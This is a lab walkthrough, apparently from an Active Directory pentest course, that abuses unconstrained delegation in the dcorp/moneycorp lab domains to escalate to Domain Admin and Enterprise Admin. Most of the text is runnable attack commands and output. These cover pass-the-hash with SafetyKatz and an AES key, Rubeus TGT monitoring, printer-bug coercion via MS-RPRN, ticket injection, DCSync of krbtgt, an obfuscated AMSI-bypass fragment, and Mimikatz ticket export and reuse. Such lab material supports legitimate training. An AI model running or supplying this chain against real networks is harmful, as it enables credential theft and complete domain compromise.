Obj 15 Unconstrained Delegation

Task - Find a server in the dcorp domain where Unconstrained Delegation is enabled. Compromise the server and escalate to Domain Admin privileges. Escalate to Enterprise Admins privileges.

We first need to find a server that has unconstrained delegation enabled

Find server with Unconstrained Delegation Enabled

PS C:\AD\Tools> Get-DomainComputer -Unconstrained | select -ExpandProperty name

Since the prerequisite for elevation using Unconstrained delegation is having admin access to the machine, we need to compromise a user which has local admin access on appsrv. Recall that we extracted secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let’s check if anyone of them have local admin privileges on dcorp-appsrv.

Try one of the servers to see if we have local admin privileges

C:\WINDOWS\system32> C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:appadmin 
/domain:dollarcorp.moneycorp.local 
/aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb
/run:cmd.exe" "exit"

In the new process run the following commands to see if we have local admin access

C:\Windows\system32> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS C:\Windows\system32> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Windows\system32> Find-PSRemotingLocalAdminAccess

We have local admin access on appsrv so we can copy Rubeus over

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Rubeus.exe \\dcorpappsrv\C$\Users\Public\Rubeus.exe /Y

We are going to run Rubeus in listener mode on appsrv

C:\Windows\system32>winrs -r:dcorp-appsrv cmd
C:\Users\appadmin>C:\Users\Public\Rubeus.exe monitor /targetuser:DCORP-DC$ 
/interval:5 /nowrap

From student/host vm let's use MS-RPRN to force Authentication from dcorp-dc

C:\AD\Tools>C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local 
\\dcorp-appsrv.dollarcorp.moneycorp.local

We should start seeing some out put on our Rubeus listener now

User : DCORP-DC$@DOLLARCORP.MONEYCORP.LOCAL
 StartTime : 11/17/2021 12:27:42 AM
 EndTime : 11/17/2021 10:27:42 AM
 RenewTill : 11/21/2021 5:55:24 AM
 Flags : name_canonicalize, pre_authent, renewable, 
forwarded, forwardable
 Base64EncodedTicket :
 doIFxTCC..

Copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process

>C:\AD\Tools\Rubeus.exe ptt /ticket:doIFx…

Now we can run a DCSync attack from the new process

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync 
/user:dcorp\krbtgt" "exit"

- Part 2 Elevate to Enterprise Admins -

To get Enterprise Admin privileges, we need to force authentication from mcorp-dc. Run the below command to listen for mcorp-dc$ tickets on dcorp-appsrv

Let's start a session on appsrv and setup a Rubeus listener

C:\Windows\system32>winrs -r:dcorp-appsrv cmd

C:\Users\appadmin>C:\Users\Public\Rubeus.exe monitor /targetuser:MCORP-DC$ 
/interval:5 /nowrap

Lets' run MS-RPRN on our host vm to trigger a response from mcorp-dc to dcorp-appsrv

C:\AD\Tools>C:\AD\Tools\MS-RPRN.exe \\mcorp-dc.moneycorp.local \\dcorpappsrv.dollarcorp.moneycorp.local

We should get a response on our Rubeus listener

[*] 11/17/2021 3:36:16 PM UTC - Found new TGT:
 User : MCORP-DC$@MONEYCORP.LOCAL
 StartTime : 11/17/2021 12:40:19 AM
 EndTime : 11/17/2021 10:40:19 AM
 RenewTill : 11/21/2021 6:06:24 AM
 Flags : name_canonicalize, pre_authent, renewable, 
forwarded, forwardable
 Base64EncodedTicket :
 doIFVjCCBV

As previously, copy the base64 encoded ticket and use it with Rubeus on student VM. Run the below command from an elevated shell as the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:

Run Rubeus to create a new process

C:\Windows\System32>C:\AD\Tools\Rubeus.exe ptt /ticket:doIFx…

Now we can run the DCSync attack from the new process

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync 
/user:mcorp\krbtgt /domain:moneycorp.local" "exit"

We are now Enterprise Admins!

- Part 3 Check the server if there is an existing DA ticket

Let's start a new invishell on our host vm

$sess = New-PSSession -ComputerName dcorpappsrv.dollarcorp.moneycorp.local
PS C:\AD\Tools> Enter-PSSession -Session $sess
[dcorp-appsrv]: PS C:\Users\appadmin\Documents> S`eT-It`em ( 'V'+'aR' +
[dcorp-appsrv]: PS C:\Users\appadmin\Documents> exit

Now let's get Mimikatz on the session and then go back into the session

PS C:\Windows\system32> Invoke-Command -FilePath C:\AD\Tools\InvokeMimikatz.ps1 -Session $sess

PS C:\Windows\system32> Enter-PSSession -Session $sess

Create a userX directory where X is your userId to avoid overwriting tickets of other users

[dcorp-appsrv]: PS C:\Users\appadmin\Documents> mkdir userX
[dcorp-appsrv]: PS C:\Users\appadmin\Documents> cd .\userX

Now let's invoke Mimikatz to dump the tickets

[dcorp-appsrv]: PS C:\Users\appadmin\Documents\userX> Invoke-Mimikatz -
Command '"sekurlsa::tickets /export"'

Now we can grep through the tickets to see which one we want to use.

[dcorp-appsrv.dollarcorp.moneycorp.local]: PS C:\Users\appadmin\Documents\userX> ls | select name

Once we find a ticket to reuse we can inject it into lsass to get DA privs

[dcorp-appsrv.dollarcorp.moneycorp.local]: PS C:\Users\appadmin\Documents\user1> Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\userX\[0;543c65]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Now we can check to see if it worked

[dcorp-appsrv.dollarcorp.moneycorp.local]:PS C:\Users\appadmin\Documents\userX> Invoke-Command -ScriptBlock{whoami;hostname} -computername dcorp-dc
dcorp\Administrator
dcorp-dc